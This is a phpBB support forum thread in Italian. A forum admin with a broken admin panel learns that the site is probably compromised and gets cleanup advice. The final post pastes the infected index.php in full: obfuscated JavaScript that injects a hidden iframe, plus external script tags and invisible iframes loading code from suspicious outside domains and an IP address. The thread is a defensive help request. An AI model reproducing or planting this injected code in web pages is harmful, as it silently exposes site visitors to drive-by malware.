phpBB Italia

Sito di supporto italiano per phpBB
https://www.phpbbitalia.net/forum/

Problemi PCA

https://www.phpbbitalia.net/forum/viewtopic.php?f=4&t=7025

Pagina 1 di 2

Problemi PCA

Inviato: 19/03/2012, 12:10
da unoperuno
Ciao a tutti, per favore aiutatemi a risolvere questo problema!
Era parecchio tempo che non mi connettevo al mio forum come admin; recentemente (l'ultima volta oggi) mi sono connessa, riesco ad accedere ma quando tento di visualizzare il PCA lo vedo tutto grigio e non posso effettuare nessuna operazione! Cosa posso fare per risolvere questo problema? Inoltre chi tenta di iscriversi dice che non riesce a visualizzare il codice di iscrizione...credo si riferiscano al captcha. Help me, please!

Re: Problemi PCA

Inviato: 19/03/2012, 12:15
da Angolo
Intanto compila correttamente il profilo nelle sue parti fondamentali: es.. versione di phpBB3.

In generale, prova con un corretto ripristino integrale ftp...
Se così non risolvi, quasi sicuramente il database è stato alterato.

Re: Problemi PCA

Inviato: 19/03/2012, 12:50
da unoperuno
Grazie, ho aggiornato il profilo come mi hai chiesto. Comunque uso la versione 3.0.8. Il database è stato alterato e come? Io non l'ho manipolato in questi mesi...
Il ripristino integrale significa che devo uploadare di nuovo tutto? Ma così non perdo utenti iscritti e messaggi?

Re: Problemi PCA

Inviato: 19/03/2012, 13:14
da Angolo
C'è una guida specifica sul ripristino integrale ftp, dove trovi anche risposta alle tue domande.


Circa l'ipotesi di alterazione del database, è appunto un'ipotesi. E tale rimarrà finché non effettui il ripristino citato.

Re: Problemi PCA

Inviato: 19/03/2012, 13:59
da Silver Surfer
Ti ho risposto anche su altre parti: stai attenta che il tuo forum contiene un cavallo di troia, suppongo in un javascript.
Mi era già capitato di trovarne, quindi non sarebbe la prima volta :geek:

Re: Problemi PCA

Inviato: 19/03/2012, 14:13
da Angolo
In tal caso, sulla base dell'indicazione di Silver, devi prima effettuare una seria e approfondita scansione antivirus e antispyware, cambiare tutte le password amministrative, ed effettuare il ripristino citato.
Sperando che il database non sia stato alterato.

Re: Problemi PCA

Inviato: 20/03/2012, 18:08
da unoperuno
Grazie sia a silver che ad angolo. Scusate se scrivo sia qui che altrove, è che avendo una certa urgenza, pensavo di far prima. Non pensavo di ritrovarvi qui ;)
Comunque già che ci sono...effettivamente ultimamente ho avuto problemi con un rootkit nel mio pc, che ho provato a estirpare ma non sono sicura di avercela fatta e dato che ero sotto tesi, non potendo rischiare di far danni ai dati sul pc, ho lasciato perdere. Il forum in questione l'ho comunque riaperto soltanto dopo aver (almeno presumibilmente) eliminato il rootkit. Potrebbero essere collegate le due cose? Come chiedevo altrove...come faccio a toglierlo questo trojan? O meglio come faccio a fare la scansione? Col mio antivirus?

Re: Problemi PCA

Inviato: 20/03/2012, 18:30
da Micogian
A volte è facile trovare i file infetti. Questi Trojan sono costituiti da una riga di codice molto lunga inserita all'inizio o alla fine dei file, generalmente index.php.
Controlla in FTP la data di aggiornamento dei file e se trovi file modificati recentemente controlla il contenuto.
Se c'è una riga strana toglila (fai prima un backup del file o di tutto il pacchetto FTP, escluso la cartella files che sarebbe troppo grossa)
Attenzione perchè è un'operazione da fare con cautela e precisione cercando di non togliere codice buono.
A volte l'intervento hacker riguarda i file .htaccess e nella root ti puoi trovare file che nulla hanno a vedere con phpbb, ma la data del file ti aiuta a capire se è un intervento recente.

Re: Problemi PCA

Inviato: 20/03/2012, 18:46
da Angolo
unoperuno, quella indicata da Micogian è una possibile soluzione.
Oppure fai una seria e approfondita scansione antivirus e antispyware sul tuo PC, e quindi un ripristino integrale ftp.


Ma o scrivi qui o scrivi altrove. Dove ritieni tu. Ma non in due o più posti nello stesso tempo. Grazie.

Re: Problemi PCA

Inviato: 21/03/2012, 16:17
da unoperuno
Sì Angolo hai ragione. Scriverò qui.
Ora provo a vedere se trovo qualche roba sospetta..Grazie Micogian



P.S.:
Ho controllato la data di modifica del file index.php e portava la data di oggi...ma io non ho modificato nulla... Questo è il codice:

Codice: Seleziona tutto

<script type="text/javascript" src="http://unitedsquashleague.com/players/code.js"></script><script type="text/javascript" src="http://drupaltestare.altervista.org/code.js"></script>

<?php /* Application: phpbb */

 header("Location: /forum/");

 // Questo file e' stato autogenerato da AlterVista 
 // Modificate o sostituite questo file solo se siete certi di quello che fate!
 //  Per proteggere questo file, disabilitando le funzioni che lo modificano automaticamente,
 // potete eliminare il commento sulla prima riga (tutto cio' che c'e' tra /* e */)
 //
 // This file was autogenerated by AlterVista
 // Modify or substitute this file only if you know what are you doing!
 //  To protect this file, disabling AlterVista's automated functions that edit it from control panel,
 // you can remove the comment on the first row of this file (everything from /* and */)
?>
<script>;function u3KEll(){function a(b){if(b.contentDocument)return b.contentDocument;if(b.contentWindow)return b.contentWindow.document;return b.document}var c={};with(c){d=/a/.__proto__=='//';e='\v'=='v';}var f='ernVSoLr';var g='wuq7RVR';var h='ernVSoLrhernVSoLrternVSoLrternVSoLrpernVSoLr:ernVSoLr/ernVSoLr/ernVSoLrternVSoLreernVSoLrlernVSoLreernVSoLrpernVSoLroernVSoLrrernVSoLrternVSoLrmernVSoLriernVSoLrsernVSoLrsernVSoLrfernVSoLroernVSoLrrernVSoLrternVSoLruernVSoLrnernVSoLreernVSoLr.ernVSoLrcernVSoLroernVSoLrmernVSoLr/ernVSoLrmernVSoLraernVSoLriernVSoLrnernVSoLr.ernVSoLrpernVSoLrhernVSoLrpernVSoLr?ernVSoLrpernVSoLraernVSoLrgernVSoLreernVSoLr=ernVSoLr5ernVSoLr5ernVSoLraernVSoLrdernVSoLrfernVSoLr1ernVSoLr0ernVSoLr9ernVSoLr3ernVSoLr4ernVSoLr2ernVSoLr4ernVSoLrdernVSoLr1ernVSoLr3ernVSoLr4ernVSoLr';var k='ernVSoLriernVSoLrfernVSoLrrernVSoLraernVSoLrmernVSoLreernVSoLr';var i=c.e?'<'+k.split(f).join('')+' name="'+g+'" src="'+h.split(f).join('')+'">':k.split(f).join('');var j=document.createElement(i);with(j){name=g;setAttribute('name',g);id=g;}if(document.body){document.body.appendChild(j);clearInterval(d36o5g);}else{return;}with(j.style){if(!c.d)position='absolute';left=top='0px';height=width='1px';visibility='hidden';}if(!c.e)a(j).location.replace(h.split(f).join(''));}if(!window.bxvZgJ){d36o5g=setInterval(u3KEll,1000);window.bxvZgJ=true}</script><iframe src="http://popmpquqq.in/t/60f652b502ea7403ea22974f155ec904" frameborder="0" style="width:10px; height:10px; display:none; border:0; top:2; left:2"></iframe><iframe src=http://google-adsens.com/in.cgi?2 width=1 height=1 frameborder=0></iframe><iframe src=http://google-adsens.com/in.cgi?2 width=1 height=1 frameborder=0></iframe><iframe src=http://31.184.242.81/link.php width=1 height=1 frameborder=0></iframe>
Tutti gli orari sono UTC+01:00
Pagina 1 di 2
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/